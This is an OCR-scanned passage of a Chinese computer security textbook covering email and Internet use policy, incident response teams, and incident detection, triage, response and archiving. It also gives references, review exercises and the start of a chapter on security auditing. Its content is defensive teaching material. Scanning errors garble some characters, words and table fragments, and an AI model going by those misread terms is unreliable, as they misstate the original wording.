© 隐私 (privacy): 员工 在 使 用 公司 提供 的 Intemet 和 电子 邮件 访问 时 ， 应 该 不 涉及 个 人 
566 隐私 。 
© 行为 标准 (standard of conduct): 在 使 用 公司 提供 的 邮件 和 Intemet 访问 时 ， 员 工 应 该 具 
有 良好 的 判断 力 ， 礼 貌 和 专业 地 使 用 。 
合理 的 个 人 使 用 (reasonable personal use): 在 不 有 悖 于 员工 的 职责 ， 不 违反 公司 的 策 
略 ， 或 者 在 不 过 度 加 重 公司 设 备 负担 的 前 提 下 ， 员 工 可 以 使 用 公司 提供 的 电子 邮件 和 
Internet 访问 来 处 理 个 人 事务 。 
e 禁止 非法 活动 (unlawful activity prohibited): 员工 不 能 利用 公司 提供 的 电子 邮件 和 
Internet 访问 从 事 具 有 非法 目的 的 活动 。 
e 安全 策略 (security policy): 在 使 用 电子 邮件 和 Internet 访问 时 ， 员 工 应 该 遵守 公司 的 安 ， 
全 策略 。 
公司 策略 ( company policy) : 员工 在 使 用 电子 邮件 和 Internet 访问 时 ， 应 该 遵守 公司 的 
其 他 政策 。 公 司 政策 包括 : 禁止 观看 、 存 储 和 传播 色情 文学 ; 禁止 制作 和 传播 骚扰 性 
和 歧视 性 的 信息 ; 禁止 未 经 授权 泄露 机 密 和 私有 信息 。 
公司 权利 (company right): 公司 可 以 访问 、 监 视 、 拦 截 、 阻 止 访问 、 检 查 、 复 制 、 浊 
露 、 使 用 、 般 坏 、 利 用 计算 机 取得 的 证 据 进行 恢复 或 保留 通信 内 容 、 文 件 或 策略 所 涵 
盖 的 其 他 数据 。 员 工 在 请 求 时 需要 提供 相应 的 口令 。 
纪律 处 分 (disciplinary action): 违反 这 些 策略 ， 相 关 责 任 人 会 立即 被 中 止 雇佣 关系 或 者 
承受 公司 相应 的 其 他 处 罚 。 


17.3.3 ”制定 策略 的 指南 


2004 年 7 月 发 行 的 机 构 电 子 邮件 和 Internet 使 用 策略 开发 指南 (Guidelines to Agencies in 
Developing Email and Internet Use Polices) 是 制定 电子 邮件 和 Internet 使 用 策略 的 一 个 有 用 的 帮 
助 文档 。 该 指南 源 自 西 澳大利亚 政府 (Govermment of Western Australia) 的 电子 政务 办 公 室 。 从 
本 书 的 支持 网 站 上 可 以 找到 该 指南 的 一 个 副本 。 


174 ”计算 机 安全 事件 响应 团队 


有 关 计 算 机 事件 响应 规程 的 开发 ， 被 大 多 数组 织 视 为 其 基本 控制 中 不 可 或 缺 的 部 分 。 大 部 
分 组 织 或 多 或 少 都 将 会 发 生 某 种 形式 的 安全 事件 ， 通 常情 况 下 ， 大 多 事件 对 组 织 产生 的 影响 较 
小 ,但 是 有 时 也 会 出 现 一 些 较 为 严重 的 事件 。 事 件 处 理 以 及 响应 规程 需要 反映 出 该 事件 对 组 织 
可 能 产生 后 果 的 范围 ， 并 会 考虑 一 个 恰当 的 响应 。 通 过 提前 建立 适当 的 规程 ， 组 织 可 以 消除 当 
员工 在 意识 到 出 现 问 题 却 不 知 如 何 进行 最 好 的 响应 时 而 产生 的 铠 慌 。 

对 于 大 中 型 组 织 而 言 ， 计 算 机 安全 事件 响应 团队 (CSIRT) 主要 负责 快速 检测 事件 ， 最 大 

限度 地 减少 损失 和 破坏 ， 消 除 可 以 被 利用 的 漏洞 ， 并 恢复 计算 机 服务 。 
NIST SP 800-61 [CICH12] 列 出 了 组 织 有 事件 响应 能 力 会 有 哪些 益处 : 
e 有 计划 地 对 事件 做 出 响应 ， 以 便 采 取 合 理 的 步骤 。 
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© 帮助 员工 快速 有 效 地 解决 安全 事件 ， 最 大 限度 地 减少 损失 或 被 盗 取 的 信息 对 服务 的 
破坏 。 
© 运用 事件 处 理 过 程 中 得 到 的 信息 ， 为 日 后 更 好 地 处 理事 件 做 准备 并 为 相关 系统 和 数据 
提供 强 有 力 的 保护 。 

© 妥善 处 理事 件 发 生 时 可 能 出 现 的 法 律 问题 。 

考虑 一 个 组 织 感染 了 大 量 邮 件 蠕虫 的 情形 ， 近 些 年 此 类 事件 频繁 发 生 。 蠕 虫 通常 先 发 掘 
普通 桌面 应 用 程序 中 未 打 补 丁 的 安全 漏洞 ， 然 后 通过 电子 邮件 传播 到 被 感染 系统 已 知 的 其 他 地 
址 。 由 此 产生 的 流量 足以 削弱 企业 局 域 网 和 Internet 服务 。 面 临 这 些 影响 时 ， 显 而 易 见 的 响应 
就 是 切断 企业 与 外 部 网 络 的 连接 ， 或 者 关闭 内 部 电子 邮件 系统 。 然 而 ， 这 一 决定 可 能 会 对 组 织 
的 一 些 运 营 事务 造成 严重 影响 ， 而 这 些 事务 可 能 相 比 阻 断 感染 的 传播 更 为 重要 ， 因 此 必须 有 一 
个 平衡 决策 。 当 检测 到 发 生 这 类 事件 时 ， 直 接 参与 的 人 员 可 能 并 没有 掌握 对 组 织 运转 做 出 关 
键 性 决定 所 需 的 信息 。 一 个 很 好 的 事件 响应 策略 应 该 根据 事件 严重 程度 指出 所 要 采取 的 措施 ; 
也 应 指定 适当 的 人 员 在 一 些 重 大 问题 发 生 时 负责 做 出 决定 ， 并 明确 如 何 联系 这 些 人 以 便 进行 
决策 。 

有 许多 事件 可 以 被 视 为 安全 事件 。 事 实 上 ， 任 何 一 个 威胁 到 一 个 或 多 个 传统 的 安全 服务 系 
统 的 保密 性 、 完 整 性 、 可 用 性 、 可 说 明 性 、 真 实 性 和 可 靠 性 的 行为 都 可 以 被 看 作 是 一 个 安全 事 
件 。 这 其 中 包括 各 种 形式 的 对 系统 未 经 授权 的 访问 ， 以 及 对 系统 信息 未 经 授权 的 修改 。 

个 人 对 系统 未 经 授权 的 访问 具体 包括 : 

e 获取 无 权 查看 的 信息 。 

。 获取 信息 后 将 其 传递 给 另 一 个 无 权 查 看 该 信息 的 人 。 

o 试图 绕 过 系统 的 安全 机 制 对 其 进行 访问 。 

o 出 于 某 种 目的 使 用 他 人 的 用 户 ID 及 密码 。 

© 在 未 授权 的 情况 下 ， 试 图 拒绝 他 人 对 系统 进行 访问 。 

个 人 对 系统 信息 未 授权 的 修改 具体 包括 : 

e 试图 毁坏 对 他 人 有 价值 的 信息 。 

。 在 未 经 授权 的 情况 下 ， 试 图 对 信息 及 资源 进行 修改 。 

© 以 未 经 授权 的 方式 处 理 信 息 。 

管理 安全 事件 涉及 以 下 方面 的 处 理 规程 和 控制 [CARN03]: 

。 检测 潜在 的 安全 事件 。 

e 对 即将 面临 的 事件 报告 进行 排序 、 分 类 、 优 先 级 处 理 。 

© 对 安全 违规 事件 进行 识别 并 做 出 响应 。 

e 记录 安全 违规 事件 以 供 日 后 参考 。 

表 17-2 列 出 了 与 计算 机 安全 事件 响应 相关 的 关键 术语 。 


表 17-2 ”安全 事件 术语 
工件 (artifact) 


在 系统 中 发 现 的 可 能 用 于 探测 或 攻击 系统 和 网 络 ， 或 正在 用 于 挫败 安全 防御 措施 的 文件 或 对 象 。 工 件 可 以 包括 
(但 不 限于 ) 计算 机 病毒 、 木 马 程序 、 蠕 虫 、 攻 击 脚本 (exploit script) 和 工具 包 。 
计算 机 安全 事件 响应 团队 (CSIRT) 

为 协助 应 对 在 一 定 服 务 区 域内 发 生 的 计算 机 安全 相关 事件 而 设立 的 能 力 机 构 ， 也 被 称 为 计算 机 事件 响应 小 组 
(CIRT) 或 CIRC (计算 机 应 急 响 应 中 心 、 计 算 机 事件 响应 能 力 )。 
服务 区 域 

享受 CSIRT 服务 的 用 户 、 网 站 、 网 络 和 组 织 的 群体 。 
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(2) 
事件 
指 违反 计算 机 安全 策略 、 可 接受 的 使 用 策略 或 者 标准 的 实践 活动 ， 或 因 违 反 上 述 策略 而 导致 的 可 能 的 威胁 。 
分 类 (triage) 


信息 的 接收 、 初 始 排序 和 优先 级 处 理 以 帮助 对 其 进行 进一步 适当 处 理 的 过 程 。 
漏洞 


一 项 技术 可 能 被 利用 导致 安全 事件 发 生 的 特性 。 例 如 ， 如 果 一 个 程序 无 意中人 允许 普通 用 户 在 特权 模式 下 执行 任意 
的 操作 系统 命令 ， 这 个 “特性 ”可 能 是 其 一 个 漏洞 。 


17.4.1 事件 检测 


安全 事件 可 以 由 用 户 或 者 管理 人 员 进 行 检测 ， 这 些 管理 人 员 负 责 报 告 系统 故障 或 者 异常 行 
为 。 应 当 鼓 励 员 工 对 此 类 事件 进行 报告 。 同 时 ， 员 工 也 应 该 报告 系统 内 任何 可 疑 的 缺陷 。 组 织 
对 员工 的 一 般 性 安全 培训 中 应 当 包含 诸如 在 此 类 情况 下 应 当 与 谁 联系 这 样 的 细节 。 

安全 事件 也 可 以 由 自动 化 工具 进行 检测 ， 这 些 工具 通常 用 于 分 析 从 系统 和 连接 的 网 络 中 所 
收集 的 数据 。 这 类 分 析 工 具 已 在 第 8 章 中 进行 了 介绍 。 这 些 工具 会 对 那些 在 将 来 可 能 出 现 事件 
的 征兆 或 者 正在 发 生 的 事件 的 迹象 进行 报告 。 可 以 对 安全 事件 进行 检测 的 工具 包括 : 

e 系统 完整 性 验证 工具 : 扫描 关键 的 系统 文件 、 目 录 和 服务 ， 以 确保 它们 没有 发 生 未 被 

适当 授权 的 改变 。 

e 日 志 分 析 工 具 : 利用 模式 识别 技术 分 析 记 录 在 审计 日 志 中 的 信息 ， 以 检测 潜在 的 安全 

事件 。 

。 网 络 和 主机 入 侵 检测 系统 (IDS): 监视 和 分 析 网 络 和 主机 的 活动 ， 通 常 是 通过 对 此 类 

信息 与 网 络 攻击 特征 进行 比较 ， 以 检测 是 否 存在 潜在 的 安全 事件 。 

。 入 侵 防御 系统 : 在 人 侵 检测 系统 的 功能 基础 上 ， 增 加 使 之 能 够 阻 断 已 检测 到 的 攻击 活 

动 的 功能 。 这 类 系统 需 谨慎 使 用 ， 因 为 如 果 它 们 对 那些 误 认 为 是 攻击 的 行为 做 出 响应 ， 
或 是 无 根据 地 降低 系统 功能 ， 会 导致 系统 出 现 问 题 。 在 第 9 章 我 们 对 此 类 系统 进行 了 
分 析 讨 论 。 

此 类 自动 化 工具 的 效率 在 很 大 程度 上 取决 于 对 其 配置 的 准确 性 ， 以 及 所 使 用 的 模式 和 特征 
的 正确 性 。 该 类 工具 需 定期 更 新 ， 以 应 对 新 的 漏洞 或 攻击 。 此 外 ， 还 需 充 分 区 分 正常 、 合 法 的 
行为 与 异常 的 攻击 行为 。 这 并 不 是 总 能 容易 实现 的 ， 而 且 还 依赖 于 具体 组 织 以 及 它们 的 系统 的 
工作 模式 。 然 而 ， 自 动 化 工具 的 一 个 显著 优势 在 于 ， 通 过 定期 更 新 使 它们 可 以 跟踪 那些 已 知 的 
攻击 或 漏洞 的 变化 。 对 于 安全 管理 员 而 言 ， 他 们 对 系统 漏洞 做 出 打 补 丁 响 应 或 是 根据 需要 及 时 
进行 调整 ， 都 很 难 跟 上 系统 安全 风险 快速 发 展 变化 的 步伐 。 使 用 自动 化 工具 可 以 帮助 组 织 减少 
此 类 响应 延迟 所 导致 的 风险 。 

在 组 织 中 部 署 此 类 工具 的 决定 取决 于 企业 的 安全 目标 、 目 的 以 及 在 风险 评估 中 所 发 现 的 某 
种 特定 要 求 。 部 署 此 类 工具 通常 涉及 大 量 的 资源 ， 既 包括 人 力也 包括 财力 。 这 就 需要 在 降低 的 
风险 和 所 得 的 收益 间 进 行 权衡 。 

无 论 是 否 使 用 自动 化 工具 ， 安 全 管理 员 都 需要 监控 与 漏洞 相关 的 报告 ， 并 在 必要 时 对 系统 
所 发 生 的 变化 做 出 响应 。 


17.4.2 分 类 功能 


此 功能 的 目标 是 ， 确 保 与 事件 处 理 服务 直接 相关 的 信息 通过 单一 联络 点 ， 而 无 须 关注 其 到 
达 方 式 〈 例 如， 通过 电子 邮件 、 热 线 电话 、 帮 助 台 或 者 IDS)， 以 便 在 服务 中 进行 适当 的 再 分 配 
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和 处 理 。 这 个 目标 通常 是 通过 将 该 分 类 功能 作为 整个 事件 处 理 服务 中 的 单一 联络 点 而 实现 的 。 
这 种 分 类 功能 通过 以 下 一 种 或 多 种 途径 对 传人 的 信息 做 出 响应 : 

1. 分 类 功能 可 能 需要 获取 更 多 的 信息 ， 以 对 事件 进行 分 类 。 

2. 如 果 事 件 涉及 一 个 已 知 的 漏洞 ， 分 类 功能 会 将 相关 漏洞 告知 企业 或 团体 的 各 个 部 门 ， 并 
彼此 分 享有 关 如 何 解决 漏洞 问题 或 减轻 漏洞 威胁 的 信息 。 

3. 分 类 功能 将 事件 标识 为 新 的 事件 或 正在 进行 的 事件 的 一 部 分 ， 并 按照 一 定 的 优先 级 将 此 


信息 交 给 事件 处 理 响应 功能 。 ~ 
17.4.3 ”事件 响应 

一 旦 某 个 潜在 的 事件 被 检测 到 ， 必 须 启动 一 个 记录 程序 对 其 做 出 响应 。[CARN03] 列举 出 
了 以 下 可 能 的 响应 活动 : 


© 采取 行动 保护 受信 侵 者 的 活动 影响 或 威胁 的 系统 和 网 络 。 

© 为 与 之 相关 的 报告 和 警示 提供 解决 方案 或 减缓 措施 。 

e 在 网 络 的 其 他 部 分 中 寻找 人 人 侵 活动 。 

e 过 滤 网 络 流量 。 

e 重建 系统 。 

e 修补 或 修复 系统 。 

e 开发 其 他 响应 或 变通 策略 。 

响应 程序 必须 详细 说 明 如 何 识 别 安全 事件 的 起 因 ， 无 论 是 意外 事件 还 是 蓄意 事件 。 随 后 ， 
该 程序 必须 描述 出 能 够 减少 组 织 的 损害 或 损失 的 活动 。 显 然 ， 撒 绘 出 每 一 类 事件 的 细节 之 处 是 
不 太 可 能 的 ,但 是 此 程序 应 能 够 识别 此 类 事件 的 类 型 ， 以 及 对 其 做 出 响应 所 需 采 取 的 步骤 。 理 
想 情 况 下 ， 应 当 包 括 有 关 可 能 出 现 的 事件 和 通常 的 响应 方式 的 描述 。 此 外 ， 还 需要 确定 负责 制 
定 那 些 对 企业 的 系统 有 重大 影响 的 决策 的 管理 人 员 ， 以 及 在 事件 发 生 时 应 如 何 随时 与 他 们 取得 
联系 。 在 某 些 情况 下 ,例如 有 大 量 的 电子 邮件 蠕虫 感染 ， 响 应 会 涉及 在 功能 的 重大 损失 和 未 来 
整个 系统 的 损害 之 间 的 权衡 ， 这 就 显得 格外 重要 。 毫 无 疑问 的 是 ， 这 样 的 决定 将 会 影响 到 企 
业 的 运作 ， 因 此 必须 迅速 做 出 决定 。NIST SP 800-61 列举 出 了 事件 响应 策略 中 涉及 的 几 类 安全 
事件 : 

e 阻止 或 妨碍 正常 使 用 系统 的 “拒绝 服务 ”攻击 。 

e 感染 主机 的 恶意 代码 。 

e 在 未 经 授权 的 情况 下 访问 系统 。 

© 违反 系统 使 用 策略 的 不 正当 使 用 。 

e 多 成 分 事件 ， 包 括 两 个 或 两 个 以 上 的 上 述 单一 事件 。 

在 确定 对 事件 的 恰当 响应 时 ， 有 一 系列 问题 应 当 考 虑 ， 包 括 该 系统 对 于 企业 功能 的 重要 程 
度 ， 以 及 就 系统 已 受 威胁 的 程度 而 言 ， 现 有 的 或 潜在 的 技术 对 事件 有 何 影响 。 

具体 的 响应 过 程 还 应 当 包括 在 某 种 情况 下 ， 需 要 将 安全 隐患 报告 给 第 三 方 ， 如 警方 或 与 此 
相关 的 CERT AR (计算 机 应 急 响 应 团队 )。 不 同 的 企业 对 于 该 报告 的 态度 有 很 大 的 差别 。 清 
晰 的 报告 有 助 于 第 三 方 监 测 计算 机 犯罪 的 整体 水 平和 发 展 趋势 ， 特 别 是 当 涉 及 法 律 诉讼 时 ， 此 
报告 也 利于 企业 收集 和 呈 递 适当 的 证 据 。 尽 管 在 某 些 情况 下 依法 需要 进行 报告 ,但 还 是 有 许多 
其 他 类 型 安全 事件 的 响应 未 被 适当 规定 。 因 此 ， 当 这 些 报告 被 认为 是 适合 于 该 组 织 时 ， 需 要 提 
前 确定 这 些 问 题 。 还 有 一 种 机 会 ， 即 如 果 一 个 事件 在 外 部 被 报告 ,那么 它 将 可 能 会 被 公共 媒体 
报道 。 一 个 组 织 需 要 确定 一 般 如 何 对 此 类 报告 做 出 响应 。 

例如 ， 出 于 起 诉 罪魁 祸首 和 弥补 所 造成 的 损失 的 目的 ， 一 个 组 织 可 以 决定 将 计算 机 辅助 诈 
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骗 的 事件 报告 给 警方 以 及 相关 的 CERT。 现 在 ， 法 律 规定 侵犯 个 人 信息 必须 上 报 有 关 部 门 ， 并 
做 出 适当 的 响应 。 然 而 ， 一 个 诸如 Web 站 点 涂改 的 事件 是 不 太 可 能 诉讼 成 功 的 。 因 此 ， 利 于 
组 织 的 策略 是 将 这 些 情况 报告 给 CERT， 并 采取 措施 进行 响应 ， 同 时 ， 尽 可 能 快速 地 恢复 功能 
并 将 此 类 攻击 再 次 发 生 的 可 能 性 降 到 最 低 。 

另 一 种 事件 响应 是 从 事件 中 收集 有 关 证 据 。 起 初 ， 这 些 信息 用 于 从 事件 中 恢复 。 如 果 事 件 
被 报告 给 警方 ， 那 么 这 些 证 据 还 可 能 在 法 律 诉讼 程 热线 /服务 台 
序 中 发 挥 作用 。 在 此 类 情况 下 ， 仔 细 记 录 收集 证 据 。 呼叫 中 心 、、 ABWR 
的 过 程 以 及 其 后 对 这 些 证 据 的 存储 和 传输 都 是 十 分 AR 
重要 的 。 如 果 在 这 些 过 程 中 不 符合 有 关 法 律 程序 ， 。 邮件 一 
那么 这 些 证 据 可 能 不 会 被 法 院 采纳 。 对 于 程序 的 具 ee 
体 要 求 因 不 同 国家 而 不 同 。NIST SP 800-61 中 包含 
了 有 关 该 问题 的 一 些 指导 意见 。 

图 17-2 给 出 了 一 个 典型 的 事件 处 理 的 生命 周 
期 。 一 旦 某 个 事件 出 现 ， 它 就 在 各 个 状态 之 间 转 
移 ， 并 伴 有 与 事件 有 关 的 所 有 信息 (变化 的 状态 和 
相关 的 活动 )， 直 到 从 相应 团队 的 角度 考虑 不 再 需 
要 进一步 的 行动 ， 事 件 才 会 结束 。 图 17-2( 左 下方 ) 
中 循环 的 部 分 说 明 这 些 状 态 在 一 个 活动 的 生命 周期 
可 能 会 多 次 循环 。 图 17-2 事件 处 理 的 生命 周期 
17.4.4 ”事件 归档 


安全 事件 即时 响应 之 后 ， 有 必要 确定 哪些 漏洞 会 导致 此 安全 事件 的 发 生 ， 以 及 怎么 解决 以 
防止 此 类 事件 再 次 发 生 。 事 件 的 详情 和 采取 的 措施 已 经 记录 下 来 以 备 将 来 参考 ， 对 组 织 系统 的 
影响 和 风险 状况 也 必须 作为 这 一 事件 的 结果 。 

事件 归档 通常 包括 将 收集 的 信息 作为 事件 的 结果 ， 反 馈 给 信息 技术 安全 管理 进程 的 较为 早 
期 的 阶段 。 这 个 事件 有 可 能 极 少 发 生 而 组 织 只 是 不 幸 遇 上 了 。 更 一 般 的 情况 是 ， 一 个 安全 事件 
反映 了 组 织 需 要 处 理 的 其 所 面临 的 风险 状况 ， 包 括 审 查 有 关系 统 的 风险 评估 ， 以 及 这 一 分 析 的 
改变 或 者 扩展 情况 。 这 包括 审查 针对 一 些 风 险 的 控制 措施 、 强 化 现 有 的 控制 措施 和 实施 新 的 控 
制 措施 。 这 个 过 程 也 反映 了 IT 安全 管理 的 循环 特征 。 


17.4.5 ”事件 处 理 的 信息 流 


许多 服务 是 事件 处 理 功 能 的 一 部 分 或 者 是 和 事件 处 理 功 能 进行 交互 的 。 表 17-3， 基 于 
[CARN03]， 是 事件 处 理 服务 信息 流 去 向 和 来 源 的 例子 。 这 一 故障 类 型 对 于 组 织 和 优化 事件 处 
理 服务 非常 有 用 ， 对 满足 事件 处 理 与 响应 要 求 的 人 员 培 训 也 非常 有 益 。 


表 17-3 事件 处 理 服务 信息 流 的 去 向 和 来 源 


事件 处 理 信息 流 去 向 


目前 攻击 场景 的 警告 


如 何 防止 特定 漏洞 的 利用 


如 何 识别 特定 恶意 软件 的 使 用 信息 
恶意 软件 影响 和 危害 信息 













事件 处 理 信 息 流 来 源 


统计 数据 或 状态 报告 
要 考虑 和 研究 的 新 的 攻击 形势 


新 漏洞 的 可 能 存在 性 


事故 中 识别 恶意 代码 情况 的 统计 
新 的 恶意 代码 样本 










恶意 软件 处 理 
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( 续 ) 


YT ET 

入 侵 检测 服务 检查 新 的 攻击 特征 

raw FRAME a 

风险 分 析 统计 或 场景 的 损失 情况 
新 工具 的 发 布 警告 要 考虑 和 研究 的 新 的 攻击 形式 

安全 工具 开发 产品 需求 提供 当前 实践 的 看 法 

17.5 “推荐 读物 


[TOTH13] 是 一 个 宛 长 的 、 有 关 安 全 培训 内 容 的 文档 。[BOWE06]、[NIST95] 和 [SZUB98] 
中 都 有 一 章 的 内 容 来 说 明 安全 意识 、 培 训 和 教育 。[ENIS10] 是 一 个 深入 的 、 极 好 的 有 关 安 全 意 
识 的 文档 。[MCG02] 和 [SIPO01] 是 关于 安全 意识 方面 的 有 用 文档 。[WYK06] 涵盖 了 安全 培训 


方面 的 内 容 。[WILS03] 广泛 涉及 了 安全 意识 和 训练 的 内 容 。 
[CICH12]、[CARN03] 和 [BROW98] 对 事件 处 理 方面 提供 了 十 分 有 用 的 参考 。 


BOWE06 


BROW98 


CARN03 


CICH12 


ENIS10 


MCGO02 


NIST95 


SIPOO1 


SZUB98 


TOTHI13 


WILS03 


WYK06 
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Response. RFC 2350, June 1998. 

Carnegie-Mellon Software Engineering Institute. Handbook for Computer 
Security Incident Response Teams (CSIRTs). CMU/SEI-2003-HB-002, 
April 2003. . 

Cichonski, P., et al. Computer Security Incident Handling Guide. NIST 
Special Publication 800-61, August 2012. 

European Network and Information Security Agency. The New Users’ 
Guide: How to Raise Information Security Awareness. ENISA Report TP- 
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Siponen, N. “Five Dimensions of Information Security Awareness.” 
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17.6 关键 术语 、 复 习题 和 习题 


关键 术语 

computer security incident (计算 机 安全 事件 ) incident handling (事件 处 理 ) 

computer security incident response team (计算 机 安 incident response (事件 响应 ) 
全 事件 响应 团队 ) security awareness (安全 意识 ) 

e-mail and Internet use policy (电子 邮件 和 Internet security education (安全 教育 ) 
使 用 策略 ) security training (安全 培训 ) 

复习 题 


17.1 ”机构 的 安全 意识 、 培 训 和 教育 项 目 有 什么 好 处 ? 

17.2 ”安全 意识 和 安全 培训 之 间 的 区 别 是 什么 ? 

17.3 ”一 个 机 构 的 安全 策略 是 指 什么 ? 

17.4 ”哪些 人 应 该 参与 开发 机 构 的 安全 策略 及 安全 策略 文档 ? 
17.5 什么 是 ISO 27002 ? 

17.6 ”制定 人 员 安 全 策略 时 ,需要 遵循 什么 原则 ? 

17.7 为 什么 电子 邮件 和 Internet 使 用 策略 是 必需 的 ? 

17.8 开发 事件 响应 能 力 有 什么 好 处 ? 

17.9 列 出 安全 事件 大 致 的 种 类 。 

17.10 列 出 一 些 事件 监测 和 事件 响应 工具 的 类 型 。 

17.11 在 整个 信息 技术 安全 管理 过 程 中 ， 处 理 安全 事件 之 后 会 出 现 什么 现象 ? 


习题 
17.1 在 17.1 节 中 包含 了 一 个 来 自 SP 800-100 的 引用 ,该 引用 证 明了 安全 意识 解决 安全 是 什么 而 不 是 怎 
样 才能 安全 的 问题 ， 试 分 析 这 两 者 之 间 的 区 别 。 
17.2 a. 警卫 Joe 在 打扫 CEO 的 办 公 室 后 ， 用 自己 的 手机 对 办 公 室 拍照 ， 这 个 动作 被 公司 的 安全 照相 机 
记录 下 来 。 但 胶片 不 太 清晰 (因为 反复 使 用 或 者 再 次 使 用 )， 你 不 能 确定 他 具体 拍摄 的 是 什么 。 
你 能 看 到 他 手机 上 照相 机 的 闪光 灯亮 过 ， 而 且 闪 光 灯 恰 在 CEO 的 桌 前 闪光 。 你 应 该 怎么 办 ? 你 
行动 的 依据 是 什么 ? 
b. 为 了 在 今后 预防 或 者 至 少 减少 任何 可 能 的 法 律 纠纷 ， 如 警卫 Joe 被 法 庭 起 诉 ， 你 应 该 怎么 办 ? 
17.3 ”在 对 Ozzie 的 电脑 进行 例 行 检查 时 ， 如 果 你 注意 到 他 的 屏幕 保护 程序 图 片 校 验 和 有 细微 的 改动 ， 你 
应 该 怎么 办 ? 
17.4 一 天 早上 ,你 看 到 Lynsay 带 着 一 个 “钥匙 扣 ”(USB O) 来 工作 ， 你 应 该 怎么 办 ? 
17.5 Harriet 的 工作 站 显示 安装 了 一 个 名 为 书 虫 ( Bookworm) 的 游戏 ， 在 遇 到 Harriet 之 前 你 应 该 做 什 
么 ? 为 什么 要 这 么 做 ? 
17.6 Phl 在 网 上 维护 着 一 个 博客 ， 在 检查 他 的 博客 有 没有 泄露 公司 的 重要 信息 时 ， 你 需要 做 什么 ? 他 
是 否 被 允许 在 工作 时 间 维 护 博客 ? 他 争辩 说 他 的 博客 是 在 非 工作 时 间 维 护 的 ， 你 应 该 怎么 回应 ? 
你 发 现 他 的 博客 有 一 个 到 YourCompanySucks 网 站 的 链接 ， 而 Phil 声称 他 不 是 这 个 站 点 的 所 有 者 ， 
你 应 该 怎么 办 ? 
17.7 考虑 为 习题 14.2 和 习题 15.1 提 到 的 小 型 会 计 事 务 所 开发 事件 响应 策略 。 更 具体 地 说 ， 是 对 于 感 
染 公 司 的 系统 和 造成 电子 邮件 大 量 传播 蔓延 的 电子 邮件 蠕虫 感染 进行 检测 之 后 的 响应 。 如 果 公 司 
的 事件 响应 策略 决定 断 开 公 司 的 网 络 连接 以 限制 蠕虫 的 继续 传播 ， 你 应 建议 其 采取 什么 默认 的 措 
w? 从 通信 在 公司 正常 运营 中 的 重要 作用 出 发 ， 对 于 这 一 事件 你 建议 相关 计算 机 应 急 响应 团队 
(Computer Emergency Response Team，CERT) 采取 什么 默认 措施 ”或 对 相关 执法 机 关 如 何 建议 ? 
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178 考虑 为 习题 14.3 和 习题 15.2 提 到 的 小 型 法 律 公司 开发 事件 响应 策略 。 更 具体 地 说 ， 是 对 于 员工 的 
财务 欺诈 行为 进行 检测 之 后 的 响应 。 事 件 响应 策略 最 初 应 采取 什么 措施 ?对 于 这 一 事件 你 建议 相 
关 CERT 采取 什么 默认 措施 ? 或 对 相关 的 执法 机 关 如 何 建议 ? 

17.9 考虑 为 习题 14.4 和 习题 15.3 提 到 的 网 站 设计 公司 开发 事件 响应 策略 。 更 具体 地 说 ， 是 对 于 人 侵 和 
损坏 公司 Web 服务 器 进行 检测 之 后 的 响应 。 如 果 公 司 的 事件 响应 策略 决定 断 开 公司 的 网 络 连接 以 
控制 损失 的 扩大 ， 你 应 建议 其 采取 什么 默认 的 措施 ? 考虑 公司 正常 运营 不 能 离开 服务 器 ， 对 于 这 
一 事件 你 建议 相关 CERT 采取 什么 默认 措施 ? 或 对 相关 的 执法 机 关 如 何 建议 ? 

17.10 考虑 为 习题 14.6 和 习题 15.5 提 到 的 大 型 政府 部 门 开发 事件 响应 策略 。 特 别 考 虑 这 样 的 场景 : 某 
部 门 员工 统一 配 发 的 笔记 本 电脑 被 窃 ， 并 发 现 其 中 存 有 大 量 敏 感 的 人 事 记 录 。 对 于 这 一 事件 进行 
响应 。 如 果 公司 的 事件 响应 策略 是 决定 与 信息 被 窃取 的 员工 进行 谈话 ， 你 应 建议 其 采取 什么 默认 
的 措施 ?” 如 果 公 司 的 事件 响应 策略 是 决定 处 罚 丢 失 笔 记 本 电脑 的 员工 ， 你 应 建议 其 采取 什么 默 
认 的 措施 ?从 任何 可 能 适用 的 相关 法 律 要 求 出 发 ， 以 及 依据 部 门 IT 策略 应 采取 的 措施 的 必要 性 ， 
你 建议 相关 CERT 采取 什么 默认 措施 ? 或 对 相关 的 执法 机 关 如 何 建 议 ? 576 
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安全 审计 





学 习 目 标 
学 习 完 本 章 之 后 ， 你 应 该 能 够 : 
© 讨论 安全 审计 体系 结构 的 组 成 部 分 ; 


© 评估 不 同类 型 的 安全 审计 迹 的 相对 优势 ; 
© 理解 实现 安全 审计 日 志 功 能 过 程 中 的 要 点 ; 
e 描述 审计 迹 分 析 的 过 程 。 


安全 审计 是 着 眼 于 机 构 的 信息 系统 (IS) 资产 安全 的 一 种 审计 形式 。 该 功能 是 计算 机 安全 
中 的 关键 部 分 。 安 全 审计 能 够 : 

e 为 与 安全 相关 的 正当 的 计算 机 操作 提供 一 定 级 别 的 保证 。 

e 无 论 攻击 是 否 成 功 ， 都 为 其 生成 可 用 于 事后 (after-the-fact) 分 析 的 数据 。 

e 提供 一 种 可 用 于 评估 安全 服务 中 存在 的 不 足 的 工具 。 

e 提供 能 够 用 于 定义 异常 行为 的 数据 。 

e 维护 对 计算 机 取证 有 用 的 记录 。 

两 个 重要 的 概念 是 审计 和 审计 迹 8， 其 定义 如 表 18-1 所 述 。 


表 18-1 安全 审计 术语 (RFC 4949 ) 


安全 审计 〈 Security Audit) 对 系统 记录 和 活动 进行 独立 的 审查 和 检查 以 确定 系统 控制 的 充分 性 ， 确 保 其 符合 已 建 
立 的 安全 策略 和 操作 规程 ， 检 测 安 全 服务 的 违规 行为 ， 并 对 措施 的 改变 提出 建议 。 

基本 的 审计 目标 是 为 发 起 或 参与 安全 相关 (security-relevant) 事件 和 活动 的 系统 实体 建立 责任 制 。 因 此 ， 需 要 由 工 
具 来 生成 和 记录 安全 审计 迹 ， 并 通过 查看 和 分 析 审 计 迹 来 发 现 和 调查 所 受 的 攻击 和 安全 损害 。 


安全 审计 迹 〈 Security Audit Trail) 按时 间 顺 序 排列 的 系统 活动 记录 ， 这 些 记录 足以 对 安全 相关 的 事务 由 开始 至 结 
束 的 整个 过 程 中 围绕 或 导致 某 种 操作 、 过 程 或 事件 的 一 系列 环境 和 活动 进行 重建 和 检查 。 


我 们 在 第 8 章 讨论 过 ， 在 审计 信息 的 生成 过 程 中 可 能 会 产生 对 实时 人 侵 检测 有 用 的 数据 。 
在 本 章 中 ， 我 们 关注 的 问题 是 与 IS 安全 相关 的 数据 的 收集 、 存 储 和 分 析 。 首 先 介绍 安全 审计 
